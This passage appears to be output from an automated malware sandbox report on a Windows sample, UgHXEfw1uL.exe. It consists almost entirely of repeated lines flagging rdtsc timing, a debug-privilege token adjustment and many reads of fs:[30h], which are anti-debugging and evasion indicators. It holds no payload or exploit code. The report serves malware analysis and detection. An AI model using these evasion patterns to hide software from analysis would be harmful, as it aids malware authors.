          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00409AB0 rdtsc 3_2_00409AB0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F1C0F0 mov eax, dword ptr fs:[00000030h]3_2_00F1C0F0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F620F0 mov ecx, dword ptr fs:[00000030h]3_2_00F620F0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F1A0E3 mov ecx, dword ptr fs:[00000030h]3_2_00F1A0E3
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA60E0 mov eax, dword ptr fs:[00000030h]3_2_00FA60E0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F280E9 mov eax, dword ptr fs:[00000030h]3_2_00F280E9
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA20DE mov eax, dword ptr fs:[00000030h]3_2_00FA20DE
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FE60B8 mov eax, dword ptr fs:[00000030h]3_2_00FE60B8
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FE60B8 mov ecx, dword ptr fs:[00000030h]3_2_00FE60B8
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FB80A8 mov eax, dword ptr fs:[00000030h]3_2_00FB80A8
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2208A mov eax, dword ptr fs:[00000030h]3_2_00F2208A
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4C073 mov eax, dword ptr fs:[00000030h]3_2_00F4C073
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F22050 mov eax, dword ptr fs:[00000030h]3_2_00F22050
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA6050 mov eax, dword ptr fs:[00000030h]3_2_00FA6050
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FB6030 mov eax, dword ptr fs:[00000030h]3_2_00FB6030
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F1A020 mov eax, dword ptr fs:[00000030h]3_2_00F1A020
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F1C020 mov eax, dword ptr fs:[00000030h]3_2_00F1C020
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F3E016 mov eax, dword ptr fs:[00000030h]3_2_00F3E016
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F3E016 mov eax, dword ptr fs:[00000030h]3_2_00F3E016
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F3E016 mov eax, dword ptr fs:[00000030h]3_2_00F3E016
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F3E016 mov eax, dword ptr fs:[00000030h]3_2_00F3E016
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA4000 mov ecx, dword ptr fs:[00000030h]3_2_00FA4000
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FC2000 mov eax, dword ptr fs:[00000030h]3_2_00FC2000
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FC2000 mov eax, dword ptr fs:[00000030h]3_2_00FC2000
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FC2000 mov eax, dword ptr fs:[00000030h]3_2_00FC2000
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FC2000 mov eax, dword ptr fs:[00000030h]3_2_00FC2000
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FC2000 mov eax, dword ptr fs:[00000030h]3_2_00FC2000
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FC2000 mov eax, dword ptr fs:[00000030h]3_2_00FC2000
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FC2000 mov eax, dword ptr fs:[00000030h]3_2_00FC2000
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FC2000 mov eax, dword ptr fs:[00000030h]3_2_00FC2000
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F501F8 mov eax, dword ptr fs:[00000030h]3_2_00F501F8
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FF61E5 mov eax, dword ptr fs:[00000030h]3_2_00FF61E5
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F9E1D0 mov eax, dword ptr fs:[00000030h]3_2_00F9E1D0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F9E1D0 mov eax, dword ptr fs:[00000030h]3_2_00F9E1D0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F9E1D0 mov ecx, dword ptr fs:[00000030h]3_2_00F9E1D0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F9E1D0 mov eax, dword ptr fs:[00000030h]3_2_00F9E1D0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F9E1D0 mov eax, dword ptr fs:[00000030h]3_2_00F9E1D0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FE61C3 mov eax, dword ptr fs:[00000030h]3_2_00FE61C3
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FE61C3 mov eax, dword ptr fs:[00000030h]3_2_00FE61C3
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA019F mov eax, dword ptr fs:[00000030h]3_2_00FA019F
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA019F mov eax, dword ptr fs:[00000030h]3_2_00FA019F
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA019F mov eax, dword ptr fs:[00000030h]3_2_00FA019F
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA019F mov eax, dword ptr fs:[00000030h]3_2_00FA019F
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F1A197 mov eax, dword ptr fs:[00000030h]3_2_00F1A197
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F1A197 mov eax, dword ptr fs:[00000030h]3_2_00F1A197
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F1A197 mov eax, dword ptr fs:[00000030h]3_2_00F1A197
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F60185 mov eax, dword ptr fs:[00000030h]3_2_00F60185
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FDC188 mov eax, dword ptr fs:[00000030h]3_2_00FDC188
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FDC188 mov eax, dword ptr fs:[00000030h]3_2_00FDC188
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FC4180 mov eax, dword ptr fs:[00000030h]3_2_00FC4180
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FC4180 mov eax, dword ptr fs:[00000030h]3_2_00FC4180
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FB8158 mov eax, dword ptr fs:[00000030h]3_2_00FB8158
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F26154 mov eax, dword ptr fs:[00000030h]3_2_00F26154
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F26154 mov eax, dword ptr fs:[00000030h]3_2_00F26154
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F1C156 mov eax, dword ptr fs:[00000030h]3_2_00F1C156
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FB4144 mov eax, dword ptr fs:[00000030h]3_2_00FB4144
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FB4144 mov eax, dword ptr fs:[00000030h]3_2_00FB4144
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FB4144 mov ecx, dword ptr fs:[00000030h]3_2_00FB4144
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FB4144 mov eax, dword ptr fs:[00000030h]3_2_00FB4144
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FB4144 mov eax, dword ptr fs:[00000030h]3_2_00FB4144
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F50124 mov eax, dword ptr fs:[00000030h]3_2_00F50124
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FCA118 mov ecx, dword ptr fs:[00000030h]3_2_00FCA118
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FCA118 mov eax, dword ptr fs:[00000030h]3_2_00FCA118
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FCA118 mov eax, dword ptr fs:[00000030h]3_2_00FCA118
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FCA118 mov eax, dword ptr fs:[00000030h]3_2_00FCA118
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FE0115 mov eax, dword ptr fs:[00000030h]3_2_00FE0115
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F302E1 mov eax, dword ptr fs:[00000030h]3_2_00F302E1
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F302E1 mov eax, dword ptr fs:[00000030h]3_2_00F302E1
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F302E1 mov eax, dword ptr fs:[00000030h]3_2_00F302E1
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2A2C3 mov eax, dword ptr fs:[00000030h]3_2_00F2A2C3
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2A2C3 mov eax, dword ptr fs:[00000030h]3_2_00F2A2C3
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2A2C3 mov eax, dword ptr fs:[00000030h]3_2_00F2A2C3
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2A2C3 mov eax, dword ptr fs:[00000030h]3_2_00F2A2C3
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2A2C3 mov eax, dword ptr fs:[00000030h]3_2_00F2A2C3
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F302A0 mov eax, dword ptr fs:[00000030h]3_2_00F302A0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F302A0 mov eax, dword ptr fs:[00000030h]3_2_00F302A0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FB62A0 mov eax, dword ptr fs:[00000030h]3_2_00FB62A0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FB62A0 mov ecx, dword ptr fs:[00000030h]3_2_00FB62A0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FB62A0 mov eax, dword ptr fs:[00000030h]3_2_00FB62A0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FB62A0 mov eax, dword ptr fs:[00000030h]3_2_00FB62A0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FB62A0 mov eax, dword ptr fs:[00000030h]3_2_00FB62A0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FB62A0 mov eax, dword ptr fs:[00000030h]3_2_00FB62A0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5E284 mov eax, dword ptr fs:[00000030h]3_2_00F5E284
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5E284 mov eax, dword ptr fs:[00000030h]3_2_00F5E284
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA0283 mov eax, dword ptr fs:[00000030h]3_2_00FA0283
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA0283 mov eax, dword ptr fs:[00000030h]3_2_00FA0283
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA0283 mov eax, dword ptr fs:[00000030h]3_2_00FA0283
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FD0274 mov eax, dword ptr fs:[00000030h]3_2_00FD0274
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FD0274 mov eax, dword ptr fs:[00000030h]3_2_00FD0274
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FD0274 mov eax, dword ptr fs:[00000030h]3_2_00FD0274
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FD0274 mov eax, dword ptr fs:[00000030h]3_2_00FD0274
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FD0274 mov eax, dword ptr fs:[00000030h]3_2_00FD0274
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FD0274 mov eax, dword ptr fs:[00000030h]3_2_00FD0274
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FD0274 mov eax, dword ptr fs:[00000030h]3_2_00FD0274
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FD0274 mov eax, dword ptr fs:[00000030h]3_2_00FD0274
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FD0274 mov eax, dword ptr fs:[00000030h]3_2_00FD0274
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FD0274 mov eax, dword ptr fs:[00000030h]3_2_00FD0274
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FD0274 mov eax, dword ptr fs:[00000030h]3_2_00FD0274
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FD0274 mov eax, dword ptr fs:[00000030h]3_2_00FD0274
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F24260 mov eax, dword ptr fs:[00000030h]3_2_00F24260
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F24260 mov eax, dword ptr fs:[00000030h]3_2_00F24260
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F24260 mov eax, dword ptr fs:[00000030h]3_2_00F24260
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F1826B mov eax, dword ptr fs:[00000030h]3_2_00F1826B
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F1A250 mov eax, dword ptr fs:[00000030h]3_2_00F1A250
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F26259 mov eax, dword ptr fs:[00000030h]3_2_00F26259
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA8243 mov eax, dword ptr fs:[00000030h]3_2_00FA8243
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA8243 mov ecx, dword ptr fs:[00000030h]3_2_00FA8243
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F1823B mov eax, dword ptr fs:[00000030h]3_2_00F1823B
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F3E3F0 mov eax, dword ptr fs:[00000030h]3_2_00F3E3F0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F3E3F0 mov eax, dword ptr fs:[00000030h]3_2_00F3E3F0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F3E3F0 mov eax, dword ptr fs:[00000030h]3_2_00F3E3F0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F563FF mov eax, dword ptr fs:[00000030h]3_2_00F563FF
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F303E9 mov eax, dword ptr fs:[00000030h]3_2_00F303E9
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F303E9 mov eax, dword ptr fs:[00000030h]3_2_00F303E9
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F303E9 mov eax, dword ptr fs:[00000030h]3_2_00F303E9
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F303E9 mov eax, dword ptr fs:[00000030h]3_2_00F303E9
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F303E9 mov eax, dword ptr fs:[00000030h]3_2_00F303E9
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F303E9 mov eax, dword ptr fs:[00000030h]3_2_00F303E9
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F303E9 mov eax, dword ptr fs:[00000030h]3_2_00F303E9
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F303E9 mov eax, dword ptr fs:[00000030h]3_2_00F303E9
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FC43D4 mov eax, dword ptr fs:[00000030h]3_2_00FC43D4
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FC43D4 mov eax, dword ptr fs:[00000030h]3_2_00FC43D4
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FDC3CD mov eax, dword ptr fs:[00000030h]3_2_00FDC3CD
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2A3C0 mov eax, dword ptr fs:[00000030h]3_2_00F2A3C0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2A3C0 mov eax, dword ptr fs:[00000030h]3_2_00F2A3C0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2A3C0 mov eax, dword ptr fs:[00000030h]3_2_00F2A3C0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2A3C0 mov eax, dword ptr fs:[00000030h]3_2_00F2A3C0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2A3C0 mov eax, dword ptr fs:[00000030h]3_2_00F2A3C0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2A3C0 mov eax, dword ptr fs:[00000030h]3_2_00F2A3C0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F283C0 mov eax, dword ptr fs:[00000030h]3_2_00F283C0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F283C0 mov eax, dword ptr fs:[00000030h]3_2_00F283C0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F283C0 mov eax, dword ptr fs:[00000030h]3_2_00F283C0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F283C0 mov eax, dword ptr fs:[00000030h]3_2_00F283C0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA63C0 mov eax, dword ptr fs:[00000030h]3_2_00FA63C0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F18397 mov eax, dword ptr fs:[00000030h]3_2_00F18397
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F18397 mov eax, dword ptr fs:[00000030h]3_2_00F18397
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F18397 mov eax, dword ptr fs:[00000030h]3_2_00F18397
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F1E388 mov eax, dword ptr fs:[00000030h]3_2_00F1E388
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F1E388 mov eax, dword ptr fs:[00000030h]3_2_00F1E388
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F1E388 mov eax, dword ptr fs:[00000030h]3_2_00F1E388
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4438F mov eax, dword ptr fs:[00000030h]3_2_00F4438F
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4438F mov eax, dword ptr fs:[00000030h]3_2_00F4438F
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FC437C mov eax, dword ptr fs:[00000030h]3_2_00FC437C
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA035C mov eax, dword ptr fs:[00000030h]3_2_00FA035C
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA035C mov eax, dword ptr fs:[00000030h]3_2_00FA035C
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA035C mov eax, dword ptr fs:[00000030h]3_2_00FA035C
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA035C mov ecx, dword ptr fs:[00000030h]3_2_00FA035C
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA035C mov eax, dword ptr fs:[00000030h]3_2_00FA035C
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA035C mov eax, dword ptr fs:[00000030h]3_2_00FA035C
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FEA352 mov eax, dword ptr fs:[00000030h]3_2_00FEA352
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA2349 mov eax, dword ptr fs:[00000030h]3_2_00FA2349
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA2349 mov eax, dword ptr fs:[00000030h]3_2_00FA2349
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA2349 mov eax, dword ptr fs:[00000030h]3_2_00FA2349
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA2349 mov eax, dword ptr fs:[00000030h]3_2_00FA2349
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA2349 mov eax, dword ptr fs:[00000030h]3_2_00FA2349
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA2349 mov eax, dword ptr fs:[00000030h]3_2_00FA2349
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA2349 mov eax, dword ptr fs:[00000030h]3_2_00FA2349
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA2349 mov eax, dword ptr fs:[00000030h]3_2_00FA2349
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA2349 mov eax, dword ptr fs:[00000030h]3_2_00FA2349
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA2349 mov eax, dword ptr fs:[00000030h]3_2_00FA2349
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA2349 mov eax, dword ptr fs:[00000030h]3_2_00FA2349
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA2349 mov eax, dword ptr fs:[00000030h]3_2_00FA2349
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA2349 mov eax, dword ptr fs:[00000030h]3_2_00FA2349
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA2349 mov eax, dword ptr fs:[00000030h]3_2_00FA2349
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA2349 mov eax, dword ptr fs:[00000030h]3_2_00FA2349
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F1C310 mov ecx, dword ptr fs:[00000030h]3_2_00F1C310
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F40310 mov ecx, dword ptr fs:[00000030h]3_2_00F40310
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5A30B mov eax, dword ptr fs:[00000030h]3_2_00F5A30B
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5A30B mov eax, dword ptr fs:[00000030h]3_2_00F5A30B
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5A30B mov eax, dword ptr fs:[00000030h]3_2_00F5A30B
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F204E5 mov ecx, dword ptr fs:[00000030h]3_2_00F204E5
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F544B0 mov ecx, dword ptr fs:[00000030h]3_2_00F544B0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FAA4B0 mov eax, dword ptr fs:[00000030h]3_2_00FAA4B0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F264AB mov eax, dword ptr fs:[00000030h]3_2_00F264AB
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4A470 mov eax, dword ptr fs:[00000030h]3_2_00F4A470
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4A470 mov eax, dword ptr fs:[00000030h]3_2_00F4A470
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4A470 mov eax, dword ptr fs:[00000030h]3_2_00F4A470
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FAC460 mov ecx, dword ptr fs:[00000030h]3_2_00FAC460
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F1645D mov eax, dword ptr fs:[00000030h]3_2_00F1645D
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4245A mov eax, dword ptr fs:[00000030h]3_2_00F4245A
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5E443 mov eax, dword ptr fs:[00000030h]3_2_00F5E443
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5E443 mov eax, dword ptr fs:[00000030h]3_2_00F5E443
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5E443 mov eax, dword ptr fs:[00000030h]3_2_00F5E443
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5E443 mov eax, dword ptr fs:[00000030h]3_2_00F5E443
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5E443 mov eax, dword ptr fs:[00000030h]3_2_00F5E443
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5E443 mov eax, dword ptr fs:[00000030h]3_2_00F5E443
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5E443 mov eax, dword ptr fs:[00000030h]3_2_00F5E443
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5E443 mov eax, dword ptr fs:[00000030h]3_2_00F5E443
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5A430 mov eax, dword ptr fs:[00000030h]3_2_00F5A430
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F1E420 mov eax, dword ptr fs:[00000030h]3_2_00F1E420
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F1E420 mov eax, dword ptr fs:[00000030h]3_2_00F1E420
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F1E420 mov eax, dword ptr fs:[00000030h]3_2_00F1E420
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F1C427 mov eax, dword ptr fs:[00000030h]3_2_00F1C427
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA6420 mov eax, dword ptr fs:[00000030h]3_2_00FA6420
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA6420 mov eax, dword ptr fs:[00000030h]3_2_00FA6420
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA6420 mov eax, dword ptr fs:[00000030h]3_2_00FA6420
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA6420 mov eax, dword ptr fs:[00000030h]3_2_00FA6420
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA6420 mov eax, dword ptr fs:[00000030h]3_2_00FA6420
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA6420 mov eax, dword ptr fs:[00000030h]3_2_00FA6420
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA6420 mov eax, dword ptr fs:[00000030h]3_2_00FA6420
